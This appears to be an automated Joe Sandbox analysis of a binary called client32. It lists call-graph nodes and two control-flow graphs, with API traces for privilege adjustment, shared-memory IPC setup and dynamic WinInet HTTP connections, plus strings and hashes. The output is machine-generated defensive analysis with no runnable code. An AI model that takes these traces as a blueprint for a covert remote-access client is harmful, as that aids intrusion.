87781->87782 87789 1102cf83 Sleep 87781->87789 87783 11142a60 21 API calls 87782->87783 87784 1102cf98 87783->87784 87785 1102cfa5 87784->87785 87786 1102cfd6 87784->87786 87785->87784 87787 1105d340 75 API calls 87785->87787 87788 1102cfd3 87786->87788 87838 110af250 87786->87838 87790 1102cfc8 87787->87790 87788->87786 87789->87782 87790->87786 87859 1102cc30 290 API calls 87790->87859 87797 1102d01a 87798 1102d02d 87797->87798 87861 11132620 295 API calls 87797->87861 87800 1100d500 FreeLibrary 87798->87800 87801 1102d339 87800->87801 87802 1102d350 87801->87802 87803 1100d220 wsprintfA 87801->87803 87806 1102d377 GetModuleFileNameA GetFileAttributesA 87802->87806 87814 1102d493 87802->87814 87804 1102d345 87803->87804 87805 11142a60 21 API calls 87804->87805 87805->87802 87808 1102d39f 87806->87808 87806->87814 87807 11142a60 21 API calls 87809 1102d542 87807->87809 87810 1110c420 261 API calls 87808->87810 87864 11142a20 FreeLibrary 87809->87864 87814->87807 87837->87777 87865 1107f690 87838->87865 87843 1102cffa 87847 110e8da0 87843->87847 87844 110af297 87877 110290f0 261 API calls 87844->87877 87848 110af250 263 API calls 87847->87848 87849 110e8dcd 87848->87849 87893 110e8170 87849->87893 87853 1102d005 87860 110af440 263 API calls 87853->87860 87854->87773 87855->87768 87856->87769 87857->87774 87858->87779 87859->87788 87860->87797 87861->87798 87866 1107f6b4 87865->87866 87867 1107f6cf 87866->87867 87868 1107f6b8 87866->87868 87870 1107f6e8 87867->87870 87871 1107f6cc 87867->87871 87878 110290f0 261 API calls 87868->87878 87874 110af240 87870->87874 87871->87867 87879 110290f0 261 API calls 87871->87879 87880 11080370 87874->87880 87881 11080391 87880->87881 87882 110803bd 87880->87882 87881->87882 87883 110803ab 87881->87883 87885 1108040a wsprintfA 87882->87885 87886 110803e5 wsprintfA 87882->87886 87884 1115e4d1 5 API calls 87883->87884 87887 110803b9 87884->87887 87892 110290f0 261 API calls 87885->87892 87886->87882 87887->87843 87887->87844 87895 110e817b 87893->87895 87894 110e8215 87903 110af440 263 API calls 87894->87903 87895->87894 87896 110e819e 87895->87896 87898 110e81b5 87895->87898 87904 110290f0 261 API calls 87896->87904 87899 110e81b2 87898->87899 87900 110e81e2 SendMessageTimeoutA 87898->87900 87899->87898 87905 110290f0 261 API calls 87899->87905 87900->87894 87903->87853 87906 1110e460 87918 1110e3c0 GetSystemDirectoryA 87906->87918 87910 1110e525 87911 1115e4d1 5 API calls 87910->87911 87912 1110e532 87911->87912 87913 1110e4bb 87913->87910 87914 1110e4f9 GetComputerNameA 87913->87914 87914->87910 87915 1110e512 87914->87915 87924 110cf020 265 API calls 87915->87924 87917 1110e522 87917->87910 87919 1110e40a 87918->87919 87920 1110e419 GetVolumeInformationA 87919->87920 87921 1115e4d1 5 API calls 87920->87921 87922 1110e450 87921->87922 87923 110cf020 265 API calls 87922->87923 87923->87913 87924->87917 87925 11073b73 87949 1106fa20 87925->87949 87927 11073b7a 6 API calls 87928 11073bc1 87927->87928 87929 11073bd8 87927->87929 87974 110290f0 261 API calls 87928->87974 87931 1110c420 261 API calls 87929->87931 87933 11073bdf 87931->87933 87934 1110d060 420 API calls 87933->87934 87935 11073bfb 87934->87935 87936 1105d340 75 API calls 87935->87936 87937 11073c3f 87936->87937 87938 11073c94 87937->87938 87940 11073c6c ExpandEnvironmentStringsA 87937->87940 87939 11073d06 CreateThread CloseHandle 87938->87939 87941 1110c420 261 API calls 87939->87941 88035 1106fd70 87939->88035 87940->87938 87942 11073d30 87941->87942 87943 1110d060 420 API calls 87942->87943 87945 11073d4c SetTimer 87942->87945 87943->87945 87946 11073d88 87945->87946 87947 1115e4d1 5 API calls 87946->87947 87948 11073dff 87947->87948 87950 1110c420 261 API calls 87949->87950 87951 1106fa5c 87950->87951 87952 1106fab5 87951->87952 87953 1106fa63 87951->87953 87980 1115e96a 34 API calls 87952->87980 87975 11087510 87953->87975 87957 1106fac8 87981 1115edc1 RaiseException 87957->87981 87959 1106fadd 87982 110879e0 281 API calls 87959->87982 87962 1106fc0c EnterCriticalSection 87966 1106fb37 87962->87966 87963 1106fd05 LeaveCriticalSection 87965 1106fd1d InterlockedDecrement 87963->87965 87963->87966 87967 1106fd37 87965->87967 87966->87963 87983 11088b00 268 API calls 87966->87983 87984 11069be0 316 API calls 87966->87984 87985 1106cc70 83 API calls 87966->87985 87986 1100fa30 35 API calls 87966->87986 87987 1100ff10 262 API calls 87966->87987 87988 1106ce90 84 API calls 87966->87988 87989 1110c580 InterlockedDecrement SetEvent PulseEvent InterlockedDecrement CloseHandle 87967->87989 87970 1106fd50 87970->87927 87990 1115e4f0 87975->87990 87980->87957 87981->87959 87982->87966 87983->87962 87984->87966 87985->87966 87986->87966 87987->87966 87988->87966 87989->87970 87991 11087534 InitializeCriticalSection 87990->87991 87992 11087380 87991->87992 87993 11142150 267 API calls 87992->87993 87995 110873b3 87993->87995 87994 1106faa3 87994->87927 87995->87994 87995->87995 87996 1110c420 261 API calls 87995->87996 87997 11087409 87996->87997 87998 1108744d 87997->87998 87999 11087436 87997->87999 88005 11085840 87998->88005 88034 110290f0 261 API calls 87999->88034 88003 11142150 267 API calls 88004 11087458 88003->88004 88004->87994 88004->88003 88004->88004 88006 1108585b 88005->88006 88007 1108585f 88006->88007 88008 11085870 88006->88008 88010 1115e4d1 5 API calls 88007->88010 88009 11141240 261 API calls 88008->88009 88012 11085877 88009->88012 88011 1108586c 88010->88011 88011->88004 88012->88012 88013 1108589b LoadLibraryA 88012->88013 88014 11085939 GetProcAddress 88013->88014 88015 110858d4 88013->88015 88018 110859dc 88014->88018 88019 11085954 GetProcAddress 88014->88019 88016 110858dd GetModuleFileNameA 88015->88016 88017 11085930 88015->88017 88021 11080be0 IsDBCSLeadByte 88016->88021 88017->88014 88017->88018 88020 1115e4d1 5 API calls 88018->88020 88019->88018 88022 11085965 GetProcAddress 88019->88022 88024 110859ea 88020->88024 88025 110858fe LoadLibraryA 88021->88025 88022->88018 88023 11085976 GetProcAddress 88022->88023 88023->88018 88026 11085987 GetProcAddress 88023->88026 88024->88004 88025->88017 88026->88018 88027 11085998 GetProcAddress 88026->88027 88027->88018 88028 110859a9 GetProcAddress 88027->88028 88028->88018 88029 110859ba GetProcAddress 88028->88029 88029->88018 88030 110859cb GetProcAddress 88029->88030 88030->88018 88031 110859ee 88030->88031 88032 1115e4d1 5 API calls 88031->88032 88033 11085a00 88032->88033 88033->88004 88041 1106fda0 88035->88041 88036 1106ff03 88037 1106fdc2 Sleep EnterCriticalSection 88037->88041 88038 1106fe7e LeaveCriticalSection 88038->88041 88041->88036 88041->88037 88041->88038 88043 1106fedd 88041->88043 88045 1106ae60 294 API calls 88041->88045 88046 1110cba0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 88041->88046 88043->88041 88047 1106e810 332 API calls 88043->88047 88048 1110cba0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 88043->88048 88045->88041 88046->88041 88047->88043 88048->88043 88049 1102ff34 88050 1113f0c0 263 API calls 88049->88050 88051 1102ff42 88050->88051 88052 1113f220 82 API calls 88051->88052 88053 1102ff85 88052->88053 88054 11080c50 82 API calls 88053->88054 88057 1102ff9a 88053->88057 88054->88057 88055 110eaed0 8 API calls 88056 1102ffc5 88055->88056 88058 1103000c 88056->88058 88100 110eaf80 77 API calls 88056->88100 88057->88055 88062 1113f220 82 API calls 88058->88062 88060 1102ffda 88101 110eaf80 77 API calls 88060->88101 88064 11030021 88062->88064 88063 1102fff0 88063->88058 88066 111429e0 19 API calls 88063->88066 88065 1110c420 261 API calls 88064->88065 88067 11030030 88065->88067 88066->88058 88068 11030051 88067->88068 88069 110879a0 264 API calls 88067->88069 88070 11089840 263 API calls 88068->88070 88069->88068 88071 11030064 OpenMutexA 88070->88071 88072 11030083 CreateMutexA 88071->88072 88073 1103016c CloseHandle 88071->88073 88075 110300a5 88072->88075 88093 11089940 88073->88093 88076 1110c420 261 API calls 88075->88076 88079 110300ba 88076->88079 88077 11030182 88078 1115e4d1 5 API calls 88077->88078 88081 11030aff 88078->88081 88102 11015e10 LoadLibraryA 88079->88102 88082 110300ef 88083 11030103 GetProcAddress 88082->88083 88084 11030119 88082->88084 88083->88084 88085 1103011d SetLastError 88083->88085 88086 11027e10 47 API calls 88084->88086 88085->88084 88087 1103012a 88086->88087 88103 11009320 423 API calls 88087->88103 88089 11030139 88090 11030142 WaitForSingleObject 88089->88090 88090->88090 88091 11030154 CloseHandle 88090->88091 88091->88073 88092 11030165 FreeLibrary 88091->88092 88092->88073 88094 110899e7 88093->88094 88099 1108997a 88093->88099 88095 110899ee DeleteCriticalSection 88094->88095 88104 11139f90 88095->88104 88096 1108998e CloseHandle 88096->88099 88098 11089a14 88098->88077 88099->88094 88099->88096 88100->88060 88101->88063 88102->88082 88103->88089 88107 11139fa4 88104->88107 88105 11139fa8 88105->88098 88107->88105 88108 11139bb0 35 API calls 88107->88108 88108->88107 88109 689d5ae6 88110 689d5af1 88109->88110 88113 689d59f0 88110->88113 88112 689d5b04 88114 689d59fc 88113->88114 88118 689d5a49 88114->88118 88119 689d5a99 88114->88119 88121 689d588c 88114->88121 88116 689d5a79 88117 689d588c 11 API calls 88116->88117 88116->88119 88117->88119 88118->88116 88118->88119 88120 689d588c 11 API calls 88118->88120 88119->88112 88120->88116 88122 689d5898 88121->88122 88123 689d58a0 88122->88123 88125 689d591a 88122->88125 88134 689d607f HeapCreate 88123->88134 88127 689d58a9 88125->88127 88128 689d599d DecodePointer 88125->88128 88126 689d58a5 88126->88127 88129 689d58c5 GetCommandLineA 88126->88129 88127->88118 88131 689d59b2 88128->88131 88130 689d58d5 88129->88130 88135 689d98c4 7 API calls 88130->88135 88131->88127 88133 689d59bd GetCurrentThreadId 88131->88133 88133->88127 88134->88126 88135->88127 88136 689b63a0 88137 689b63a5 88136->88137 88138 689b63a9 WSACancelBlockingCall 88137->88138 88139 689b63b1 Sleep 88137->88139

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 615 1109d4a0-1109d502 call 1109cc90 618 1109d508-1109d52b call 1109c750 615->618 619 1109db20 615->619 624 1109d531-1109d545 LocalAlloc 618->624 625 1109d694-1109d696 618->625 620 1109db22-1109db3d call 1115e4d1 619->620 627 1109d54b-1109d57d InitializeSecurityDescriptor SetSecurityDescriptorDacl GetVersionExA 624->627 628 1109db15-1109db1b call 1109c7e0 624->628 629 1109d626-1109d64b CreateFileMappingA 625->629 630 1109d60a-1109d620 627->630 631 1109d583-1109d5ae call 1109c6c0 call 1109c700 627->631 628->619 633 1109d698-1109d6ab GetLastError 629->633 634 1109d64d-1109d66d GetLastError call 110ee9e0 629->634 630->629 661 1109d5f9-1109d601 631->661 662 1109d5b0-1109d5e6 GetSecurityDescriptorSacl 631->662 636 1109d6ad 633->636 637 1109d6b2-1109d6c9 MapViewOfFile 633->637 645 1109d678-1109d680 634->645 646 1109d66f-1109d676 LocalFree 634->646 636->637 640 1109d6cb-1109d6e6 call 110ee9e0 637->640 641 1109d707-1109d70f 637->641 664 1109d6e8-1109d6e9 LocalFree 640->664 665 1109d6eb-1109d6f3 640->665 643 1109d7b1-1109d7c3 641->643 644 1109d715-1109d72e GetModuleFileNameA 641->644 649 1109d809-1109d822 call 1115e4f0 GetTickCount 643->649 650 1109d7c5-1109d7c8 643->650 651 1109d7cd-1109d7e8 call 110ee9e0 644->651 652 1109d734-1109d73d 644->652 653 1109d682-1109d683 LocalFree 645->653 654 1109d685-1109d68f 645->654 646->645 680 1109d824-1109d829 649->680 657 1109d8af-1109d913 GetCurrentProcessId GetModuleFileNameA call 1109cb20 650->657 678 1109d7ea-1109d7eb LocalFree 651->678 679 1109d7ed-1109d7f5 651->679 652->651 658 1109d743-1109d746 652->658 653->654 660 1109db0e-1109db10 call 1109cbd0 654->660 682 1109d91b-1109d932 CreateEventA 657->682 683 1109d915 657->683 667 1109d789-1109d7ac call 110ee9e0 call 1109cbd0 658->667 668 1109d748-1109d74c 658->668 660->628 661->630 672 1109d603-1109d604 FreeLibrary 661->672 662->661 671 1109d5e8-1109d5f3 SetSecurityDescriptorSacl 662->671 664->665 674 1109d6f8-1109d702 665->674 675 1109d6f5-1109d6f6 LocalFree 665->675 667->643 668->667 677 1109d74e-1109d759 668->677 671->661 672->630 674->660 675->674 684 1109d760-1109d764 677->684 678->679 685 1109d7fa-1109d804 679->685 686 1109d7f7-1109d7f8 LocalFree 679->686 687 1109d82b-1109d83a 680->687 688 1109d83c 680->688 692 1109d934-1109d953 GetLastError * 2 call 110ee9e0 682->692 693 1109d956-1109d95e 682->693 683->682 690 1109d780-1109d782 684->690 691 1109d766-1109d768 684->691 685->660 686->685 687->680 687->688 694 1109d83e-1109d844 688->694 701 1109d785-1109d787 690->701 698 1109d76a-1109d770 691->698 699 1109d77c-1109d77e 691->699 692->693 702 1109d960 693->702 703 1109d966-1109d977 CreateEventA 693->703 696 1109d855-1109d8ad 694->696 697 1109d846-1109d853 694->697 696->657 697->694 697->696 698->690 704 1109d772-1109d77a 698->704 699->701 701->651 701->667 702->703 706 1109d979-1109d998 GetLastError * 2 call 110ee9e0 703->706 707 1109d99b-1109d9a3 703->707 704->684 704->699 706->707 708 1109d9ab-1109d9bd CreateEventA 707->708 709 1109d9a5 707->709 711 1109d9bf-1109d9de GetLastError * 2 call 110ee9e0 708->711 712 1109d9e1-1109d9e9 708->712 709->708 711->712 715 1109d9eb 712->715 716 1109d9f1-1109da02 CreateEventA 712->716 715->716 718 1109da24-1109da32 716->718 719 1109da04-1109da21 GetLastError * 2 call 110ee9e0 716->719 721 1109da34-1109da35 LocalFree 718->721 722 1109da37-1109da3f 718->722 719->718 721->722 724 1109da41-1109da42 LocalFree 722->724 725 1109da44-1109da4d 722->725 724->725 726 1109da53-1109da56 725->726 727 1109daf7-1109db09 call 110ee9e0 725->727 726->727 729 1109da5c-1109da5f 726->729 727->660 729->727 731 1109da65-1109da68 729->731 731->727 732 1109da6e-1109da71 731->732 733 1109da7c-1109da98 CreateThread 732->733 734 1109da73-1109da79 GetCurrentThreadId 732->734 735 1109da9a-1109daa4 733->735 736 1109daa6-1109dab0 733->736 734->733 735->660 737 1109daca-1109daf5 SetEvent call 110ee9e0 call 1109c7e0 736->737 738 1109dab2-1109dac8 ResetEvent * 3 736->738 737->620 738->737
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1109C750: GetCurrentProcess.KERNEL32(000F01FF,?,1102FAC3,00000000,00000000,00080000,BBC4A55B,00080000,00000000,00000000), ref: 1109C77D
                                                                                                                                                                                                      • Part of subcall function 1109C750: OpenProcessToken.ADVAPI32(00000000), ref: 1109C784
                                                                                                                                                                                                      • Part of subcall function 1109C750: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109C795
                                                                                                                                                                                                      • Part of subcall function 1109C750: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109C7B9
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,BBC4A55B,00080000,00000000,00000000), ref: 1109D535
                                                                                                                                                                                                    • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109D54E
                                                                                                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109D559
                                                                                                                                                                                                    • GetVersionExA.KERNEL32(?), ref: 1109D570
                                                                                                                                                                                                    • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D5DE
                                                                                                                                                                                                    • SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109D5F3
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D604
                                                                                                                                                                                                    • CreateFileMappingA.KERNEL32(000000FF,1102FAC3,00000004,00000000,?,?), ref: 1109D640
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1109D64D
                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 1109D676
                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 1109D683
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1109D6A0
                                                                                                                                                                                                    • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109D6BE
                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 1109D6E9
                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 1109D6F6
                                                                                                                                                                                                      • Part of subcall function 1109C6C0: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109D58E), ref: 1109C6C8
                                                                                                                                                                                                      • Part of subcall function 1109C700: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109C714
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109D722
                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 1109D7EB
                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 1109D7F8
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1109D818
                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 1109D8C4
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109D8DF
                                                                                                                                                                                                    • CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109D92B
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1109D934
                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 1109D93B
                                                                                                                                                                                                    • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109D970
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1109D979
                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 1109D980
                                                                                                                                                                                                    • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109D9B6
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1109D9BF
                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 1109D9C6
                                                                                                                                                                                                    • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109D9FB
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 1109DA0A
                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 1109DA0D
                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 1109DA35
                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 1109DA42
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 1109DA73
                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00002000,Function_0009D030,00000000,00000000,00000030), ref: 1109DA8D
                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 1109DABC
                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 1109DAC2
                                                                                                                                                                                                    • ResetEvent.KERNEL32(?), ref: 1109DAC8
                                                                                                                                                                                                    • SetEvent.KERNEL32(?), ref: 1109DACE
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView
                                                                                                                                                                                                    • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
                                                                                                                                                                                                    • API String ID: 4267466239-2792520954
                                                                                                                                                                                                    • Opcode ID: 7d2eca5f92aeb90d6110f97020967db0a84e126fbda8524f3f6ea0900cc0b1d0
                                                                                                                                                                                                    • Instruction ID: d0fdbac131d557a40c9b368ac235ec40647fb92da06757c3bb5e6f0a5f2f1ed9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d2eca5f92aeb90d6110f97020967db0a84e126fbda8524f3f6ea0900cc0b1d0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F1270B5E002599FDB20DF65CCD4AAEB7FAFB88304F0045A9E60D97240E771A984CF61

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 743 11029230-110292be LoadLibraryA 744 110292c1-110292c6 743->744 745 110292c8-110292cb 744->745 746 110292cd-110292d0 744->746 747 110292e5-110292ea 745->747 748 110292d2-110292d5 746->748 749 110292d7-110292e2 746->749 750 11029319-11029325 747->750 751 110292ec-110292f1 747->751 748->747 749->747 754 110293ca-110293cd 750->754 755 1102932b-11029343 call 1115f321 750->755 752 110292f3-1102930a GetProcAddress 751->752 753 1102930c-1102930f 751->753 752->753 758 11029311-11029313 SetLastError 752->758 753->750 756 110293e8-11029400 InternetOpenA 754->756 757 110293cf-110293e6 GetProcAddress 754->757 765 11029364-11029370 755->765 766 11029345-1102935e GetProcAddress 755->766 761 11029424-11029430 call 1115f3b5 756->761 757->756 760 11029419-11029421 SetLastError 757->760 758->750 760->761 771 11029436-11029467 call 1113e8f0 call 11160b10 761->771 772 110296aa-110296b4 761->772 770 11029372-1102937b GetLastError 765->770 773 11029391-11029393 765->773 766->765 767 11029402-1102940a SetLastError 766->767 767->770 770->773 774 1102937d-1102938f call 1115f3b5 call 1115f321 770->774 796 11029469-1102946c 771->796 797 1102946f-11029484 call 11080b10 * 2 771->797 772->744 776 110296ba 772->776 778 110293b0-110293bc 773->778 779 11029395-110293ae GetProcAddress 773->779 774->773 781 110296cc-110296cf 776->781 778->754 800 110293be-110293c7 778->800 779->778 783 1102940f-11029417 SetLastError 779->783 785 110296d1-110296d6 781->785 786 110296db-110296de 781->786 783->754 792 1102983f-11029847 785->792 787 110296e0-110296e5 786->787 788 110296ea 786->788 793 1102980f-11029814 787->793 794 110296ed-110296f5 788->794 798 11029850-11029863 792->798 799 11029849-1102984a FreeLibrary 792->799 803 11029816-1102982d GetProcAddress 793->803 804 1102982f-11029835 793->804 801 110296f7-1102970e GetProcAddress 794->801 802 11029714-1102971d 794->802 796->797 817 11029486-1102948a 797->817 818 1102948d-11029499 797->818 799->798 800->754 801->802 807 110297ce-110297d0 SetLastError 801->807 810 11029720-11029722 802->810 803->804 808 11029837-11029839 SetLastError 803->808 804->792 812 110297d6-110297dd 807->812 808->792 810->812 814 11029728-1102972d 810->814 815 110297ec-1102980d call 11027510 * 2 812->815 814->815 819 11029733-1102976f call 1110c4a0 call 110274c0 814->819 815->793 817->818 821 110294c4-110294c9 818->821 822 1102949b-1102949d 818->822 846 11029781-11029783 819->846 847 11029771-11029774 819->847 828 110294cb-110294dc GetProcAddress 821->828 829 110294de-110294f5 InternetConnectA 821->829 825 110294b4-110294ba 822->825 826 1102949f-110294b2 GetProcAddress 822->826 825->821 826->825 831 110294bc-110294be SetLastError 826->831 828->829 833 11029521-1102952c SetLastError 828->833 834 11029697-110296a7 call 1115e091 829->834 835 110294fb-110294fe 829->835 831->821 833->834 834->772 839 11029500-11029502 835->839 840 11029539-11029541 835->840 841 11029504-11029517 GetProcAddress 839->841 842 11029519-1102951f 839->842 844 11029543-11029557 GetProcAddress 840->844 845 11029559-11029574 840->845 841->842 848 11029531-11029533 SetLastError 841->848 842->840 844->845 851 11029576-1102957e SetLastError 844->851 857 11029581-11029584 845->857 849 11029785 846->849 850 1102978c-11029791 846->850 847->846 852 11029776-1102977a 847->852 848->840 849->850 853 11029793-110297a9 call 110cedc0 850->853 854 110297ac-110297ae 850->854 851->857 852->846 858 1102977c 852->858 853->854 860 110297b0-110297b2 854->860 861 110297b4-110297c5 call 1115e091 854->861 862 11029692-11029695 857->862 863 1102958a-1102958f 857->863 858->846 860->861 866 110297df-110297e9 call 1115e091 860->866 861->815 877 110297c7-110297c9 861->877 862->834 865 110296bc-110296c9 call 1115e091 862->865 868 11029591-110295a8 GetProcAddress 863->868 869 110295aa-110295b6 863->869 865->781 866->815 868->869 873 110295b8-110295c0 SetLastError 868->873 876 110295c2-110295db GetLastError 869->876 873->876 879 110295f6-1102960b 876->879 880 110295dd-110295f4 GetProcAddress 876->880 877->794 883 11029615-11029623 GetLastError 879->883 880->879 881 1102960d-1102960f SetLastError 880->881 881->883 884 11029625-1102962a 883->884 885 1102962c-11029638 GetDesktopWindow 883->885 884->885 886 11029682-11029687 884->886 887 11029653-1102966f 885->887 888 1102963a-11029651 GetProcAddress 885->888 886->862 889 11029689-1102968f 886->889 887->862 892 11029671 887->892 888->887 890 11029676-11029680 SetLastError 888->890 889->862 890->862 892->857
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(WinInet.dll,BBC4A55B,75C223A0,?,00000000), ref: 11029265
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110292FF
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11029313
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029351
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 11029372
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 110293A1
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 110293DB
                                                                                                                                                                                                    • InternetOpenA.WININET(11190240,?,?,000000FF,00000000), ref: 110293FA
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11029404
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11029411
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 1102941B
                                                                                                                                                                                                      • Part of subcall function 1115F3B5: HeapFree.KERNEL32(00000000,00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3CB
                                                                                                                                                                                                      • Part of subcall function 1115F3B5: GetLastError.KERNEL32(00000000,?,11167F76,00000000,?,110B7069), ref: 1115F3DD
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110294A5
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 110294BE
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 110294D1
                                                                                                                                                                                                    • InternetConnectA.WININET(000000FF,111955E0,00000050,00000000,00000000,00000003,00000000,00000000), ref: 110294EE
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102950A
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 11029523
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 11029549
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 1102959D
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 11029703
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 110297D0
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029822
